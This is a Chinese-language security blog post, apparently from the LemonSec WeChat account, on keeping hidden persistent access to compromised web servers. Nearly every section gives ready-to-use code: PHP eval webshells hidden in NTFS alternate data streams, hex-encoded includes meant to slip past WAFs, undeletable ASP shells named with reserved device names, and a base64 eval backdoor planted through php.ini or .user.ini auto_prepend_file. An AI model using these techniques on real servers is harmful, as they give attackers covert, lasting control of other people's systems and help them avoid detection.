脚本权限维持相关的一些总结

0x01 说明

未知攻，焉知防，在web端如何做手脚维护自己拿到的权限呢？权限维持，为后渗透阶段做准备，脚本方面有哪些有趣的Tips呢?结合系统一些特性，我们可以更好的隐蔽我们的后门。

0x02 创建系统隐藏文件

attrib +s +a +r +h / attrib +s +h 文件名

查看隐藏文件

0x03 利用ADS隐藏文件

NTFS交换数据流（Alternate　Data　Streams，简称ADS）是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流。通俗的理解，就是其它文件可以“寄宿”在某个文件身上，而在资源管理器中却只能看到宿主文件，找不到寄宿文件。利用ADS数据流，我们可以做很多有趣的事情。

首先创建ADS隐藏文件

在命令行，echo一个数据流进去，比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

这样就生成了一个不可见的 index.php:shell.jpg

可用 dir /r 命令来查看

修改与删除ADS隐藏文件

修改进入文件所在目录: notepad index.php:shell.jpg

删除index.php:shell.jpg呢？直接删除index.php。

如果你对NTFS文件宿主寄生虫感兴趣可以参考key表哥的这篇文章。

文件寄生——NTFS文件流实际应用https://www.freebuf.com/column/143101.html

文件包含

我们生成了index.php:shell.jpg，可以通过包含文件的方式来使用。

<?php include('index.php:shell.jpg');?>

还可以用上面学的隐藏include.php

免杀，但是躲不过waf扫描。

pack()函数
该函数用来将对应的参数打包成二进制字符串。

根据这个特性我们把 index.php:shell.jpg hex编码来绕过waf。

<?php $a="696E6465782E7068703A7368656C6C2E6A7067"; // index.php:shell.jpg hex编码$b="a";include(PACK('H*',$$b));

0x04 asp不死僵尸

主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。
Windows 下不能够以下面这些字样来命名文件或文件夹：

aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9

生成

copy rootkit.asp \.D:wwwrootaux.test.asp

这类文件无法在图形界面删除，只能在命令行下删除：

del \.D:wwwrootaux.test.asp

0x05 phpinfo查看是否开启环境变量 include_path

在C盘，创建 C:phppear目录，把木马文件丢上去。

再包含下就OK了，大多数waf并不会扫描这个路径，很容易被人忽略。

0x06 php.ini后门

将后门写入php.ini

allow_url_include=Onauto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"                            // base64 <?php @eval($_REQUEST[cmd]);?>　　　　　　　　　            // 后门类型可自己修改。

完成后需要重新加载PHP.ini
使用死循环

<?php while(true){} ?>

任意PHP页面都可以用菜刀连接。

也可以直接使用.user.ini 
简单来说，它和 php.ini 功能一样，但是是高度自定义，程序执行时会先寻找当前目录下是否存在 .user.ini 文件，如果没有会继续向根目录寻找，直到配置目录下的 php.ini。

auto_prepend_file = 1.txtuser_ini.cache_ttl = 10  //设置加载时间为10s 不需要重启apache时间一到自动加载。

0x07 php backdoor

也叫做PHP扩展后门，隐蔽性比webshell强度了。我们使用的是Micropoor大牛的php backdoor

How to install?

0x08 参考

https://www.cnblogs.com/xiaozi/p/7610984.htmlhttps://paper.tuisec.win/detail/e7e0e752a08c09chttps://www.t00ls.net/viewthread.php?tid=38906&highlight=php.inihttps://www.t00ls.net/viewthread.php?tid=35053&highlight=php%2B%E5%90%8E%E9%97%A8https://www.t00ls.net/viewthread.php?tid=44911&highlight=php%2B%E5%90%8E%E9%97%A8

为方便技术交流、接收粉丝建议，贴出了运营小哥哥的微信，可扫码加

依旧是限时加，晚5点后会暂时关闭二维码加好友

欢迎各位大佬加好友

一如既往的学习，一如既往的整理，一如即往的分享。感谢支持

“如侵权请私聊公众号删文”

2020hw系列文章整理

ctf系列文章整理

日志安全系列-安全日志

【干货】流量分析系列文章整理

【干货】超全的 渗透测试系列文章整理

【干货】持续性更新-内网渗透测试系列文章

【干货】android安全系列文章整理

扫描关注LemonSec

本文始发于微信公众号（LemonSec）：脚本权限维持相关的一些总结